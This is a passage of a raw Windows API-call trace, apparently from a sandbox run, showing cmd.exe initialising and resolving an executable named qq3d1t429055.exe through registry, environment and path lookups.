Size=0xaca) returned 0x36a56f8 [0209.285] FreeEnvironmentStringsA (penv="A") returned 1 [0209.285] GetProcessHeap () returned 0x36a0000 [0209.285] RtlAllocateHeap (HeapHandle=0x36a0000, Flags=0x8, Size=0x4) returned 0x36a4500 [0209.285] GetEnvironmentStringsW () returned 0x36a4c20* [0209.285] GetProcessHeap () returned 0x36a0000 [0209.285] RtlAllocateHeap (HeapHandle=0x36a0000, Flags=0x8, Size=0xaca) returned 0x36a61d0 [0209.285] FreeEnvironmentStringsA (penv="A") returned 1 [0209.285] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32fec58 | out: phkResult=0x32fec58*=0xc4) returned 0x0 [0209.286] RegQueryValueExW (in: hKey=0xc4, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32fec60, lpData=0x32fec64, lpcbData=0x32fec5c*=0x1000 | out: lpType=0x32fec60*=0x0, lpData=0x32fec64*=0xe8, lpcbData=0x32fec5c*=0x1000) returned 0x2 [0209.286] RegQueryValueExW (in: hKey=0xc4, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32fec60, lpData=0x32fec64, lpcbData=0x32fec5c*=0x1000 | out: lpType=0x32fec60*=0x4, lpData=0x32fec64*=0x1, lpcbData=0x32fec5c*=0x4) returned 0x0 [0209.286] RegQueryValueExW (in: hKey=0xc4, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32fec60, lpData=0x32fec64, lpcbData=0x32fec5c*=0x1000 | out: lpType=0x32fec60*=0x0, lpData=0x32fec64*=0x1, lpcbData=0x32fec5c*=0x1000) returned 0x2 [0209.286] RegQueryValueExW (in: hKey=0xc4, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32fec60, lpData=0x32fec64, lpcbData=0x32fec5c*=0x1000 | out: lpType=0x32fec60*=0x4, lpData=0x32fec64*=0x0, lpcbData=0x32fec5c*=0x4) returned 0x0 [0209.286] RegQueryValueExW (in: hKey=0xc4, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32fec60, lpData=0x32fec64, lpcbData=0x32fec5c*=0x1000 | out: lpType=0x32fec60*=0x4, lpData=0x32fec64*=0x40, lpcbData=0x32fec5c*=0x4) returned 0x0 [0209.286] RegQueryValueExW (in: hKey=0xc4, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32fec60, lpData=0x32fec64, lpcbData=0x32fec5c*=0x1000 | out: lpType=0x32fec60*=0x4, lpData=0x32fec64*=0x40, lpcbData=0x32fec5c*=0x4) returned 0x0 [0209.286] RegQueryValueExW (in: hKey=0xc4, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32fec60, lpData=0x32fec64, lpcbData=0x32fec5c*=0x1000 | out: lpType=0x32fec60*=0x0, lpData=0x32fec64*=0x40, lpcbData=0x32fec5c*=0x1000) returned 0x2 [0209.286] RegCloseKey (hKey=0xc4) returned 0x0 [0209.287] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32fec58 | out: phkResult=0x32fec58*=0xc4) returned 0x0 [0209.287] RegQueryValueExW (in: hKey=0xc4, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32fec60, lpData=0x32fec64, lpcbData=0x32fec5c*=0x1000 | out: lpType=0x32fec60*=0x0, lpData=0x32fec64*=0x40, lpcbData=0x32fec5c*=0x1000) returned 0x2 [0209.287] RegQueryValueExW (in: hKey=0xc4, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32fec60, lpData=0x32fec64, lpcbData=0x32fec5c*=0x1000 | out: lpType=0x32fec60*=0x4, lpData=0x32fec64*=0x1, lpcbData=0x32fec5c*=0x4) returned 0x0 [0209.287] RegQueryValueExW (in: hKey=0xc4, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32fec60, lpData=0x32fec64, lpcbData=0x32fec5c*=0x1000 | out: lpType=0x32fec60*=0x0, lpData=0x32fec64*=0x1, lpcbData=0x32fec5c*=0x1000) returned 0x2 [0209.287] RegQueryValueExW (in: hKey=0xc4, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32fec60, lpData=0x32fec64, lpcbData=0x32fec5c*=0x1000 | out: lpType=0x32fec60*=0x4, lpData=0x32fec64*=0x0, lpcbData=0x32fec5c*=0x4) returned 0x0 [0209.287] RegQueryValueExW (in: hKey=0xc4, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32fec60, lpData=0x32fec64, lpcbData=0x32fec5c*=0x1000 | out: lpType=0x32fec60*=0x4, lpData=0x32fec64*=0x9, lpcbData=0x32fec5c*=0x4) returned 0x0 [0209.288] RegQueryValueExW (in: hKey=0xc4, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32fec60, lpData=0x32fec64, lpcbData=0x32fec5c*=0x1000 | out: lpType=0x32fec60*=0x4, lpData=0x32fec64*=0x9, lpcbData=0x32fec5c*=0x4) returned 0x0 [0209.288] RegQueryValueExW (in: hKey=0xc4, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32fec60, lpData=0x32fec64, lpcbData=0x32fec5c*=0x1000 | out: lpType=0x32fec60*=0x0, lpData=0x32fec64*=0x9, lpcbData=0x32fec5c*=0x1000) returned 0x2 [0209.288] RegCloseKey (hKey=0xc4) returned 0x0 [0209.288] time (in: timer=0x0 | out: timer=0x0) returned 0x5e578f7c [0209.288] srand (_Seed=0x5e578f7c) [0209.288] GetCommandLineW () returned="\"cmd.exe\" /c qq3d1t429055.exe" [0209.289] malloc (_Size=0x4000) returned 0x38a21f0 [0209.290] GetCommandLineW () returned="\"cmd.exe\" /c qq3d1t429055.exe" [0209.290] malloc (_Size=0xffce) returned 0x37a0048 [0209.291] ??_V@YAXPAX@Z () returned 0x32ffc3c [0209.293] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x37a0048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0209.293] malloc (_Size=0xffce) returned 0x37b0020 [0209.294] ??_V@YAXPAX@Z () returned 0x32ffa10 [0209.295] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x37b0020, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0209.295] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0209.295] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0209.295] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0209.296] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0209.296] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0209.296] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0209.296] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0209.296] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0209.296] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0209.296] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0209.296] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0209.298] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0209.298] GetProcessHeap () returned 0x36a0000 [0209.299] RtlFreeHeap (HeapHandle=0x36a0000, Flags=0x0, BaseAddress=0x36a56f8) returned 1 [0209.299] GetEnvironmentStringsW () returned 0x36a4c20* [0209.299] GetProcessHeap () returned 0x36a0000 [0209.299] RtlAllocateHeap (HeapHandle=0x36a0000, Flags=0x8, Size=0xae2) returned 0x36a7798 [0209.299] FreeEnvironmentStringsA (penv="A") returned 1 [0209.299] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0209.299] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0209.299] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0209.300] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0209.300] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0209.300] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0209.300] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0209.300] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0209.300] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0209.300] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0209.300] malloc (_Size=0xffce) returned 0x37bfff8 [0209.301] ??_V@YAXPAX@Z () returned 0x32ff7a8 [0209.302] GetProcessHeap () returned 0x36a0000 [0209.302] RtlAllocateHeap (HeapHandle=0x36a0000, Flags=0x8, Size=0x38) returned 0x36a4598 [0209.302] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x37bfff8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0209.303] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x37bfff8, lpFilePart=0x32ff7f4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x32ff7f4*="Desktop") returned 0x17 [0209.304] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0209.304] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x32ff578 | out: lpFindFileData=0x32ff578*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x36a45d8 [0209.304] FindClose (in: hFindFile=0x36a45d8 | out: hFindFile=0x36a45d8) returned 1 [0209.305] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0x32ff578 | out: lpFindFileData=0x32ff578*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x36a45d8 [0209.305] FindClose (in: hFindFile=0x36a45d8 | out: hFindFile=0x36a45d8) returned 1 [0209.305] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0x32ff578 | out: lpFindFileData=0x32ff578*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x78cb719f, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x78cb719f, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x36a45d8 [0209.305] FindClose (in: hFindFile=0x36a45d8 | out: hFindFile=0x36a45d8) returned 1 [0209.306] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0209.306] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0209.306] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0209.306] GetProcessHeap () returned 0x36a0000 [0209.306] RtlFreeHeap (HeapHandle=0x36a0000, Flags=0x0, BaseAddress=0x36a7798) returned 1 [0209.306] GetEnvironmentStringsW () returned 0x36a4c20* [0209.306] GetProcessHeap () returned 0x36a0000 [0209.306] RtlAllocateHeap (HeapHandle=0x36a0000, Flags=0x8, Size=0xb1a) returned 0x36a6ca8 [0209.307] FreeEnvironmentStringsA (penv="=") returned 1 [0209.307] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x37a0048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0209.307] GetProcessHeap () returned 0x36a0000 [0209.307] RtlFreeHeap (HeapHandle=0x36a0000, Flags=0x0, BaseAddress=0x36a4598) returned 1 [0209.307] ??_V@YAXPAX@Z () returned 0x1 [0209.307] ??_V@YAXPAX@Z () returned 0x1 [0209.307] GetProcessHeap () returned 0x36a0000 [0209.307] RtlAllocateHeap (HeapHandle=0x36a0000, Flags=0x8, Size=0x400e) returned 0x36a8db0 [0209.308] GetProcessHeap () returned 0x36a0000 [0209.308] RtlAllocateHeap (HeapHandle=0x36a0000, Flags=0x8, Size=0x2e) returned 0x36a4598 [0209.308] GetProcessHeap () returned 0x36a0000 [0209.308] RtlFreeHeap (HeapHandle=0x36a0000, Flags=0x0, BaseAddress=0x36a8db0) returned 1 [0209.308] GetConsoleOutputCP () returned 0x1b5 [0209.638] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf03850 | out: lpCPInfo=0xf03850) returned 1 [0209.638] GetUserDefaultLCID () returned 0x409 [0209.639] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xeff82c, cchData=8 | out: lpLCData=":") returned 2 [0209.640] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x32ffb64, cchData=128 | out: lpLCData="0") returned 2 [0209.640] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x32ffb64, cchData=128 | out: lpLCData="0") returned 2 [0209.641] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x32ffb64, cchData=128 | out: lpLCData="1") returned 2 [0209.641] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xeff81c, cchData=8 | out: lpLCData="/") returned 2 [0209.641] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xeff7b8, cchData=32 | out: lpLCData="Mon") returned 4 [0209.641] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xeff778, cchData=32 | out: lpLCData="Tue") returned 4 [0209.641] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xeff738, cchData=32 | out: lpLCData="Wed") returned 4 [0209.641] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xeff6f8, cchData=32 | out: lpLCData="Thu") returned 4 [0209.641] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xeff6b8, cchData=32 | out: lpLCData="Fri") returned 4 [0209.641] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xeff678, cchData=32 | out: lpLCData="Sat") returned 4 [0209.642] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xeff638, cchData=32 | out: lpLCData="Sun") returned 4 [0209.642] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xeff80c, cchData=8 | out: lpLCData=".") returned 2 [0209.642] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xeff7f8, cchData=8 | out: lpLCData=",") returned 2 [0209.642] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0209.647] GetProcessHeap () returned 0x36a0000 [0209.647] RtlAllocateHeap (HeapHandle=0x36a0000, Flags=0x0, Size=0x20c) returned 0x36a77d0 [0209.647] GetConsoleTitleW (in: lpConsoleTitle=0x36a77d0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0210.038] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x73b80000 [0210.038] GetProcAddress (hModule=0x73b80000, lpProcName="CopyFileExW") returned 0x73b94330 [0210.038] GetProcAddress (hModule=0x73b80000, lpProcName="IsDebuggerPresent") returned 0x73b95930 [0210.038] GetProcAddress (hModule=0x73b80000, lpProcName="SetConsoleInputExeNameW") returned 0x74eb09d0 [0210.038] ??_V@YAXPAX@Z () returned 0x1 [0210.040] GetProcessHeap () returned 0x36a0000 [0210.040] RtlAllocateHeap (HeapHandle=0x36a0000, Flags=0x8, Size=0x400a) returned 0x36a8db0 [0210.040] GetProcessHeap () returned 0x36a0000 [0210.040] RtlFreeHeap (HeapHandle=0x36a0000, Flags=0x0, BaseAddress=0x36a8db0) returned 1 [0210.045] _wcsicmp (_String1="qq3d1t429055.exe", _String2=")") returned 72 [0210.045] _wcsicmp (_String1="FOR", _String2="qq3d1t429055.exe") returned -11 [0210.045] _wcsicmp (_String1="FOR/?", _String2="qq3d1t429055.exe") returned -11 [0210.045] _wcsicmp (_String1="IF", _String2="qq3d1t429055.exe") returned -8 [0210.045] _wcsicmp (_String1="IF/?", _String2="qq3d1t429055.exe") returned -8 [0210.045] _wcsicmp (_String1="REM", _String2="qq3d1t429055.exe") returned 1 [0210.045] _wcsicmp (_String1="REM/?", _String2="qq3d1t429055.exe") returned 1 [0210.045] GetProcessHeap () returned 0x36a0000 [0210.045] RtlAllocateHeap (HeapHandle=0x36a0000, Flags=0x8, Size=0x58) returned 0x36a79e8 [0210.045] GetProcessHeap () returned 0x36a0000 [0210.045] RtlAllocateHeap (HeapHandle=0x36a0000, Flags=0x8, Size=0x2a) returned 0x36a4618 [0210.049] GetConsoleTitleW (in: lpConsoleTitle=0x32ffa58, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0210.470] malloc (_Size=0xffce) returned 0x37b2600 [0210.472] ??_V@YAXPAX@Z () returned 0x32ff7e4 [0210.474] malloc (_Size=0xffce) returned 0x37c25d8 [0210.475] ??_V@YAXPAX@Z () returned 0x32ff59c [0210.478] GetFileAttributesW (lpFileName="qq3d1t429055.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\qq3d1t429055.exe")) returned 0x20 [0210.478] _wcsicmp (_String1="qq3d1t429055.exe", _String2="DIR") returned 13 [0210.478] _wcsicmp (_String1="qq3d1t429055.exe", _String2="ERASE") returned 12 [0210.479] _wcsicmp (_String1="qq3d1t429055.exe", _String2="DEL") returned 13 [0210.479] _wcsicmp (_String1="qq3d1t429055.exe", _String2="TYPE") returned -3 [0210.479] _wcsicmp (_String1="qq3d1t429055.exe", _String2="COPY") returned 14 [0210.479] _wcsicmp (_String1="qq3d1t429055.exe", _String2="CD") returned 14 [0210.479] _wcsicmp (_String1="qq3d1t429055.exe", _String2="CHDIR") returned 14 [0210.479] _wcsicmp (_String1="qq3d1t429055.exe", _String2="RENAME") returned -1 [0210.479] _wcsicmp (_String1="qq3d1t429055.exe", _String2="REN") returned -1 [0210.479] _wcsicmp (_String1="qq3d1t429055.exe", _String2="ECHO") returned 12 [0210.479] _wcsicmp (_String1="qq3d1t429055.exe", _String2="SET") returned -2 [0210.479] _wcsicmp (_String1="qq3d1t429055.exe", _String2="PAUSE") returned 1 [0210.479] _wcsicmp (_String1="qq3d1t429055.exe", _String2="DATE") returned 13 [0210.479] _wcsicmp (_String1="qq3d1t429055.exe", _String2="TIME") returned -3 [0210.479] _wcsicmp (_String1="qq3d1t429055.exe", _String2="PROMPT") returned 1 [0210.480] _wcsicmp (_String1="qq3d1t429055.exe", _String2="MD") returned 4 [0210.480] _wcsicmp (_String1="qq3d1t429055.exe", _String2="MKDIR") returned 4 [0210.480] _wcsicmp (_String1="qq3d1t429055.exe", _String2="RD") returned -1 [0210.480] _wcsicmp (_String1="qq3d1t429055.exe", _String2="RMDIR") returned -1 [0210.480] _wcsicmp (_String1="qq3d1t429055.exe", _String2="PATH") returned 1 [0210.480] _wcsicmp (_String1="qq3d1t429055.exe", _String2="GOTO") returned 10 [0210.480] _wcsicmp (_String1="qq3d1t429055.exe", _String2="SHIFT") returned -2 [0210.480] _wcsicmp (_String1="qq3d1t429055.exe", _String2="CLS") returned 14 [0210.480] _wcsicmp (_String1="qq3d1t429055.exe", _String2="CALL") returned 14 [0210.480] _wcsicmp (_String1="qq3d1t429055.exe", _String2="VERIFY") returned -5 [0210.480] _wcsicmp (_String1="qq3d1t429055.exe", _String2="VER") returned -5 [0210.480] _wcsicmp (_String1="qq3d1t429055.exe", _String2="VOL") returned -5 [0210.480] _wcsicmp (_String1="qq3d1t429055.exe", _String2="EXIT") returned 12 [0210.481] _wcsicmp (_String1="qq3d1t429055.exe", _String2="SETLOCAL") returned -2 [0210.481] _wcsicmp (_String1="qq3d1t429055.exe", _String2="ENDLOCAL") returned 12 [0210.481] _wcsicmp (_String1="qq3d1t429055.exe", _String2="TITLE") returned -3 [0210.481] _wcsicmp (_String1="qq3d1t429055.exe", _String2="START") returned -2 [0210.481] _wcsicmp (_String1="qq3d1t429055.exe", _String2="DPATH") returned 13 [0210.481] _wcsicmp (_String1="qq3d1t429055.exe", _String2="KEYS") returned 6 [0210.481] _wcsicmp (_String1="qq3d1t429055.exe", _String2="MOVE") returned 4 [0210.481] _wcsicmp (_String1="qq3d1t429055.exe", _String2="PUSHD") returned 1 [0210.481] _wcsicmp (_String1="qq3d1t429055.exe", _String2="POPD") returned 1 [0210.481] _wcsicmp (_String1="qq3d1t429055.exe", _String2="ASSOC") returned 16 [0210.481] _wcsicmp (_String1="qq3d1t429055.exe", _String2="FTYPE") returned 11 [0210.481] _wcsicmp (_String1="qq3d1t429055.exe", _String2="BREAK") returned 15 [0210.481] _wcsicmp (_String1="qq3d1t429055.exe", _String2="COLOR") returned 14 [0210.481] _wcsicmp (_String1="qq3d1t429055.exe", _String2="MKLINK") returned 4 [0210.481] _wcsicmp (_String1="qq3d1t429055.exe", _String2="DIR") returned 13 [0210.482] _wcsicmp (_String1="qq3d1t429055.exe", _String2="ERASE") returned 12 [0210.482] _wcsicmp (_String1="qq3d1t429055.exe", _String2="DEL") returned 13 [0210.482] _wcsicmp (_String1="qq3d1t429055.exe", _String2="TYPE") returned -3 [0210.482] _wcsicmp (_String1="qq3d1t429055.exe", _String2="COPY") returned 14 [0210.482] _wcsicmp (_String1="qq3d1t429055.exe", _String2="CD") returned 14 [0210.482] _wcsicmp (_String1="qq3d1t429055.exe", _String2="CHDIR") returned 14 [0210.482] _wcsicmp (_String1="qq3d1t429055.exe", _String2="RENAME") returned -1 [0210.482] _wcsicmp (_String1="qq3d1t429055.exe", _String2="REN") returned -1 [0210.482] _wcsicmp (_String1="qq3d1t429055.exe", _String2="ECHO") returned 12 [0210.482] _wcsicmp (_String1="qq3d1t429055.exe", _String2="SET") returned -2 [0210.482] _wcsicmp (_String1="qq3d1t429055.exe", _String2="PAUSE") returned 1 [0210.482] _wcsicmp (_String1="qq3d1t429055.exe", _String2="DATE") returned 13 [0210.482] _wcsicmp (_String1="qq3d1t429055.exe", _String2="TIME") returned -3 [0210.482] _wcsicmp (_String1="qq3d1t429055.exe", _String2="PROMPT") returned 1 [0210.483] _wcsicmp (_String1="qq3d1t429055.exe", _String2="MD") returned 4 [0210.483] _wcsicmp (_String1="qq3d1t429055.exe", _String2="MKDIR") returned 4 [0210.483] _wcsicmp (_String1="qq3d1t429055.exe", _String2="RD") returned -1 [0210.483] _wcsicmp (_String1="qq3d1t429055.exe", _String2="RMDIR") returned -1 [0210.483] _wcsicmp (_String1="qq3d1t429055.exe", _String2="PATH") returned 1 [0210.483] _wcsicmp (_String1="qq3d1t429055.exe", _String2="GOTO") returned 10 [0210.483] _wcsicmp (_String1="qq3d1t429055.exe", _String2="SHIFT") returned -2 [0210.483] _wcsicmp (_String1="qq3d1t429055.exe", _String2="CLS") returned 14 [0210.483] _wcsicmp (_String1="qq3d1t429055.exe", _String2="CALL") returned 14 [0210.483] _wcsicmp (_String1="qq3d1t429055.exe", _String2="VERIFY") returned -5 [0210.483] _wcsicmp (_String1="qq3d1t429055.exe", _String2="VER") returned -5 [0210.483] _wcsicmp (_String1="qq3d1t429055.exe", _String2="VOL") returned -5 [0210.483] _wcsicmp (_String1="qq3d1t429055.exe", _String2="EXIT") returned 12 [0210.484] _wcsicmp (_String1="qq3d1t429055.exe", _String2="SETLOCAL") returned -2 [0210.484] _wcsicmp (_String1="qq3d1t429055.exe", _String2="ENDLOCAL") returned 12 [0210.484] _wcsicmp (_String1="qq3d1t429055.exe", _String2="TITLE") returned -3 [0210.484] _wcsicmp (_String1="qq3d1t429055.exe", _String2="START") returned -2 [0210.484] _wcsicmp (_String1="qq3d1t429055.exe", _String2="DPATH") returned 13 [0210.485] _wcsicmp (_String1="qq3d1t429055.exe", _String2="KEYS") returned 6 [0210.485] _wcsicmp (_String1="qq3d1t429055.exe", _String2="MOVE") returned 4 [0210.485] _wcsicmp (_String1="qq3d1t429055.exe", _String2="PUSHD") returned 1 [0210.485] _wcsicmp (_String1="qq3d1t429055.exe", _String2="POPD") returned 1 [0210.485] _wcsicmp (_String1="qq3d1t429055.exe", _String2="ASSOC") returned 16 [0210.485] _wcsicmp (_String1="qq3d1t429055.exe", _String2="FTYPE") returned 11 [0210.485] _wcsicmp (_String1="qq3d1t429055.exe", _String2="BREAK") returned 15 [0210.485] _wcsicmp (_String1="qq3d1t429055.exe", _String2="COLOR") returned 14 [0210.485] _wcsicmp (_String1="qq3d1t429055.exe", _String2="MKLINK") returned 4 [0210.485] _wcsicmp (_String1="qq3d1t429055.exe", _String2="FOR") returned 11 [0210.485] _wcsicmp (_String1="qq3d1t429055.exe", _String2="IF") returned 8 [0210.486] _wcsicmp (_String1="qq3d1t429055.exe", _String2="REM") returned -1 [0210.488] ??_V@YAXPAX@Z () returned 0x1 [0210.488] GetProcessHeap () returned 0x36a0000 [0210.488] RtlAllocateHeap (HeapHandle=0x36a0000, Flags=0x8, Size=0xffd6) returned 0x36a8db0 [0210.491] GetProcessHeap () returned 0x36a0000 [0210.491] RtlAllocateHeap (HeapHandle=0x36a0000, Flags=0x8, Size=0x2a) returned 0x36a7a48 [0210.491] _wcsnicmp (_String1="qq3d", _String2="cmd ", _MaxCount=0x4) returned 14 [0210.491] malloc (_Size=0xffce) returned 0x37c25d8 [0210.492] ??_V@YAXPAX@Z () returned 0x32ff31c [0210.493] GetProcessHeap () returned 0x36a0000 [0210.493] RtlAllocateHeap (HeapHandle=0x36a0000, Flags=0x8, Size=0x1ffa4) returned 0x36b8d90 [0210.501] SetErrorMode (uMode=0x0) returned 0x0 [0210.501] SetErrorMode (uMode=0x1) returned 0x0 [0210.501] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x36b8d98, lpFilePart=0x32ff33c | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x32ff33c*="Desktop") returned 0x17 [0210.501] SetErrorMode (uMode=0x0) returned 0x1 [0210.501] GetProcessHeap () returned 0x36a0000 [0210.501] RtlReAllocateHeap (Heap=0x36a0000, Flags=0x0, Ptr=0x36b8d90, Size=0x5a) returned 0x36b8d90 [0210.502] GetProcessHeap () returned 0x36a0000 [0210.502] RtlSizeHeap (HeapHandle=0x36a0000, Flags=0x0, MemoryPointer=0x36b8d90) returned 0x5a [0210.502] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0210.502] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0210.503] GetProcessHeap () returned 0x36a0000 [0210.503] RtlAllocateHeap (HeapHandle=0x36a0000, Flags=0x8, Size=0x1b4) returned 0x36a7a80 [0210.503] GetProcessHeap () returned 0x36a0000 [0210.503] RtlAllocateHeap (HeapHandle=0x36a0000, Flags=0x8, Size=0x360) returned 0x36a7c40 [0211.118] GetProcessHeap () returned 0x36a0000 [0211.118] RtlReAllocateHeap (Heap=0x36a0000, Flags=0x0, Ptr=0x36a7c40, Size=0x1b6) returned 0x36a7c40 [0211.118] GetProcessHeap () returned 0x36a0000 [0211.118] RtlSizeHeap (HeapHandle=0x36a0000, Flags=0x0, MemoryPointer=0x36a7c40) returned 0x1b6 [0211.118] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 